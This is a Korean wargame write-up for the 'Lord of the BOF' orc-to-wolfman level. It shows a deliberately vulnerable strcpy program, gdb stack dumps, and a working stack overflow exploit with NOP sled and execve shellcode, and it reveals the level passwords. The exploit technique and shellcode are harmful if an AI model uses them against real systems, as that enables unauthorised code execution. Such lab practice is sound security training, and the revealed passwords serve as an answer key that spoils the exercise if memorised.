[lob] orc -> wolfman

728x90

1. intro

2. code 및 분석

2.1 C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}
	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

2.3. 분석

2.3.1. assembler code (중요 부분)

앞선 문제와 동일하지만, 아래가 추가되었고,

0x80485d6 <main+214>:	push   $0x28
0x80485d8 <main+216>:	push   $0x0
0x80485da <main+218>:	lea    0xffffffd8(%ebp),%eax
0x80485dd <main+221>:	push   %eax
0x80485de <main+222>:	call   0x8048430 <memset>

해당 부분은 buffer 영역을 초기화한다.

3. 취약점 확인 및 공격 준비

3.1 취약점

앞의 문제와 마찬가지이다.

하지만 이번에는 ret address가 0xbf로 시작해야하기에 stack을 사용해야 하지만, buffer 변수는 초기화한다.

3.2 공격 준비

환경변수와 buffer 변수를 초기화하기에 해당 영역은 사용 불가능하다.

하지만 지금까지 공격한 것과 같이 ret address 이후 영역 사용이 가능하다.

(gdb) r `python -c 'print "A"*0x2c + "\xbf\xbf\xbf\xbf" + "B"*100'`
Starting program: /home/orc/wolfmaa `python -c 'print "A"*0x2c + "\xbf\xbf\xbf\xbf" + "B"*100'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Breakpoint 2, 0x80485e6 in main ()
(gdb) x/40x $esp
0xbffffa5c:	0x00000016	0x00000000	0x00000000	0x00000000
0xbffffa6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa7c:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffa8c:	0xbfbfbfbf	0x42424242	0x42424242	0x42424242
0xbffffa9c:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffaac:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffabc:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffacc:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffadc:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffaec:	0x42424242	0x42424242	0xbffffc00	0xbffffea8

4. exploit

위를 토대로 공격해보면 아래와 같다.

[orc@localhost orc]$ ./wolfmaa `python -c 'print "\x90"*0x2c + "\x9c\xfa\xff\xbf" + "\x90"*0x20 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
󿐐1hpassh/my-h/bin 
                 㱍 
Segmentation fault (core dumped)
[orc@localhost orc]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./wolfmaa 󿐐'.
Program terminated with signal 11, Segmentation fault.
#0  0xbffffabf in ?? ()
(gdb) x/40x 0xbffffabf - 100
0xbffffa5b:	0x05d920ff	0x0143e040	0xfffa7c40	0x066070bf
0xbffffa6b:	0x10698040	0x00ae6040	0xfffb0440	0xfffab8bf
0xbffffa7b:	0x0485e3bf	0xfffa9008	0x000000bf	0x00002800
0xbffffa8b:	0x00001700	0x0000e000	0x00000000	0x00000000
0xbffffa9b:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaab:	0x00000000	0x00000000	0x00000000	0x90909000
0xbffffabb:	0x00028290	0x90909000	0x90909090	0x90909090
0xbffffacb:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffadb:	0x90909090	0x89c03190	0x50c189c2	0x73617068
0xbffffaeb:	0x6d2f6873	0x2f682d79	0x896e6962	0xcd0bb0e3
(gdb) q
[orc@localhost orc]$ ./wolfmaa `python -c 'print "\x90"*0x2c + "\xcb\xfa\xff\xbf" + "\x90"*0x20 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
̺ÿ¿1hpassh/my-h/bin 
                  㱍 
euid = 504
cantata
[orc@localhost orc]$ ./wolfman `python -c 'print "\x90"*0x2c + "\xcb\xfa\xff\xbf" + "\x90"*0x20 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
̺ÿ¿1hpassh/my-h/bin 
                  㱍 
euid = 505
love eyuna